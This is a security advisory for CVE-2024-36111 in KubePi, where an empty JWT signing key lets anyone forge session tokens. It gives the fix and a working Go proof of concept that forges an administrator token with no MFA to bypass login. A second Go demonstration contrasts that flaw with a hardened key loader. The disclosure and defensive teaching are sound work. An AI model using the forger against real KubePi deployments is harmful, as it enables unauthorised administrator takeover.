Improper Validation of Integrity Check Value Affecting github.com/1panel-dev/kubepi/internal/config package, versions >=1.6.3 <1.8.0


Severity

medium (CVSS assessment made by Snyk's Security Team)

Threat Intelligence

Exploit Maturity: Proof of concept
EPSS: 0.04% (12th percentile)

  • Snyk ID: SNYK-GOLANG-GITHUBCOM1PANELDEVKUBEPIINTERNALCONFIG-7572605
  • Published: 29 Jul 2024
  • Disclosed: 25 Jul 2024
  • Credit: ibranch7

Introduced: 25 Jul 2024

CVE-2024-36111
CWE-1259

How to fix?

Upgrade github.com/1Panel-dev/KubePi/internal/config to version 1.8.0 or higher.

Overview

Affected versions of this package are vulnerable to Improper Validation of Integrity Check Value because of how the JWT signing key is handled while the configuration file is read: the key used to sign and verify session tokens can end up empty. An HS256 signature computed with an empty key is not a secret at all, so an unauthenticated attacker can mint a token carrying an administrator profile, sign it with the same empty key, and present it to the backend. Login verification is bypassed entirely and the attacker takes over the backend without any credentials.

PoC

package main

import (
    "fmt"
    "github.com/kataras/iris/v12/middleware/jwt"
    "time"
)

// Token lifetime: long enough that the forged token does not expire while it is being used.
var jwtMaxAge = 100000 * time.Minute

// UserProfile mirrors the claims the affected backend embeds in its session tokens.
type UserProfile struct {
    Name                string              `json:"name"`
    NickName            string              `json:"nickName"`
    Email               string              `json:"email"`
    Language            string              `json:"language"`
    ResourcePermissions map[string][]string `json:"resourcePermissions"`
    IsAdministrator     bool                `json:"isAdministrator"`
    Mfa                 Mfa                 `json:"mfa"`
}

type Mfa struct {
    Enable   bool   `json:"enable"`
    Secret   string `json:"secret"`
    Approved bool   `json:"approved"`
}

func main() {
    // Sign with HS256 and an EMPTY key. This is the key the affected versions end
    // up using after reading their configuration, so no server-side secret is
    // needed to produce a signature the backend will accept.
    jwtSigner := jwt.NewSigner(jwt.HS256, "", jwtMaxAge)
    test := map[string][]string{}
    profile := UserProfile{
        Name:                "admin",
        NickName:            "Administrator",
        Email:               "support@fit2cloud.com",
        Language:            "zh-CN",
        ResourcePermissions: test,
        IsAdministrator:     true, // claim administrator privileges outright
        Mfa: Mfa{
            Secret:   "",
            Enable:   false, // no MFA challenge for this "user"
            Approved: false,
        },
    }
    forgedJWT, err := jwtSigner.Sign(profile)
    if err != nil {
        panic(err)
    }
    // Present this value as the bearer token to the affected backend.
    fmt.Println(string(forgedJWT))
}
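The following added example is my own standard-library-only Go, not KubePi's code and not the iris middleware the PoC above imports. It reduces the overview and the PoC to their essentials: a minimal HS256 signer and verifier, a config loader that passes an empty key straight through (the behaviour the overview describes), and a hardened loader that refuses empty or short keys and generates a random one when none is configured. The 32-byte minimum, the helper names and the single-claim profile are my assumptions; the exact change shipped in 1.8.0 is not shown on this page.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// Claims is a cut-down version of the profile the PoC embeds in the token.
type Claims struct {
	Name            string `json:"name"`
	IsAdministrator bool   `json:"isAdministrator"`
}

// SignHS256 builds a compact JWS (header.payload.signature) with HMAC-SHA256.
func SignHS256(key []byte, claims Claims) (string, error) {
	header := base64.RawURLEncoding.EncodeToString([]byte(`{"alg":"HS256","typ":"JWT"}`))
	body, err := json.Marshal(claims)
	if err != nil {
		return "", err
	}
	signingInput := header + "." + base64.RawURLEncoding.EncodeToString(body)
	mac := hmac.New(sha256.New, key)
	mac.Write([]byte(signingInput))
	return signingInput + "." + base64.RawURLEncoding.EncodeToString(mac.Sum(nil)), nil
}

// VerifyHS256 recomputes the MAC, compares in constant time and decodes the claims.
func VerifyHS256(key []byte, token string) (Claims, error) {
	var c Claims
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return c, errors.New("malformed token")
	}
	sig, err := base64.RawURLEncoding.DecodeString(parts[2])
	if err != nil {
		return c, err
	}
	mac := hmac.New(sha256.New, key)
	mac.Write([]byte(parts[0] + "." + parts[1]))
	if !hmac.Equal(sig, mac.Sum(nil)) {
		return c, errors.New("bad signature")
	}
	body, err := base64.RawURLEncoding.DecodeString(parts[1])
	if err != nil {
		return c, err
	}
	return c, json.Unmarshal(body, &c)
}

// LoadJWTKeyVulnerable models the flawed pattern: whatever the config holds is
// used as-is, so an unset key becomes the empty HMAC key (assumed model).
func LoadJWTKeyVulnerable(configured string) []byte {
	return []byte(configured)
}

// minKeyLen is an assumed policy value: 32 bytes matches the HS256 output size.
const minKeyLen = 32

// LoadJWTKeyHardened refuses short keys and generates a random one when unset,
// so an empty configuration can never yield a guessable signing key.
func LoadJWTKeyHardened(configured string) ([]byte, error) {
	if configured == "" {
		key := make([]byte, minKeyLen)
		if _, err := rand.Read(key); err != nil {
			return nil, err
		}
		return key, nil
	}
	if len(configured) < minKeyLen {
		return nil, fmt.Errorf("jwt key too short: %d bytes, need at least %d", len(configured), minKeyLen)
	}
	return []byte(configured), nil
}

func main() {
	// Server side: the configuration sets no key (constructed scenario).
	serverKey := LoadJWTKeyVulnerable("")

	// Attacker side: forge an administrator token with the same empty key.
	forged, _ := SignHS256([]byte(""), Claims{Name: "admin", IsAdministrator: true})
	claims, err := VerifyHS256(serverKey, forged)
	fmt.Println("vulnerable loader accepts forged token:", err == nil, "admin:", claims.IsAdministrator)

	// Hardened side: the empty config yields a random key and the forgery fails.
	hardKey, _ := LoadJWTKeyHardened("")
	_, err = VerifyHS256(hardKey, forged)
	fmt.Println("hardened loader rejects forged token:", err != nil)
}
```

The check worth carrying into any JWT-backed service is the one in LoadJWTKeyHardened: a missing or short secret must be a startup error or a freshly generated random key, never a silently accepted empty string, because with HMAC the verification key is the only thing standing between a client-supplied claims object and an administrator session.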
